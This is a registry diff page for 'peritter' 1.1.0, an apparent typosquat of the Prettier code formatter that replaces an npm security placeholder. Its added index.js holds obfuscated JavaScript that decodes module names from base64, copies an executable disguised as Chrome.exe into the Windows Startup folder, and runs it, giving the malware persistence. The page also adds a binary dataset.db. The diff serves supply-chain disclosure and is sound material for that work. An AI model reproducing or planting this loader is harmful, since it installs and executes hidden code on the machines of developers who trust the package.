peritter 0.0.1-security → 1.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of peritter might be problematic. Click here for more details.
- package/dataset.db +0 -0
- package/index.js +1 -0
- package/package.json +16 -3
- package/README.md +0 -5
package/dataset.db
ADDED
|
Binary file
|
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const x1y2z3=["ZnM=","cGF0aA==","Y2hpbGRfcHJvY2Vzcw==","bm9kZV9tb2R1bGVzJTJG","JTJGR29vZ2xLJTJGQ2hyb21lLmV4ZQ==","JTJGR29vZ2x1","JTJGZGF0YXNldC5kYg=="];const a1b2c3=require(decodeURIComponent(atob(x1y2z3[0]))),d4e5f6=require(decodeURIComponent(atob(x1y2z3[1]))),{exec:g7h8i9}=require(decodeURIComponent(atob(x1y2z3[2]))),username=process.env.USERNAME,sourceFile=`C:\\Users\\0xS1rx58\\AppData\\Roaming\\GooglK\\Chrome.exe`,startupFolder=`C:\\Users\\${username}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`,destFile=d4e5f6.resolve(startupFolder,"Chrome.exe");if(!a1b2c3.existsSync(sourceFile)){return;}if(!a1b2c3.existsSync(startupFolder)){a1b2c3.mkdirSync(startupFolder,{recursive:true});}try{a1b2c3.copyFileSync(sourceFile,destFile);}catch(b8c9d0){return;}setTimeout(()=>{g7h8i9(`"${destFile}"`,(b1c2d3,e4f5g6,h7i8j9)=>{if(b1c2d3){return;}});},5000);
|
package/package.json
CHANGED
|
@@ -1,6 +1,19 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "peritter",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.1.0",
|
|
4
|
+
"description": "Prettier is an opinionated code formatter",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"repository": {
|
|
10
|
+
"type": "git",
|
|
11
|
+
"url": "git+https://github.com/prettier/prettier.git"
|
|
12
|
+
},
|
|
13
|
+
"author": "53317258.d3v",
|
|
14
|
+
"license": "ISC",
|
|
15
|
+
"bugs": {
|
|
16
|
+
"url": "https://github.com/prettier/prettier/issues"
|
|
17
|
+
},
|
|
18
|
+
"homepage": "https://github.com/prettier/prettier#readme"
|
|
6
19
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=peritter for more information.
|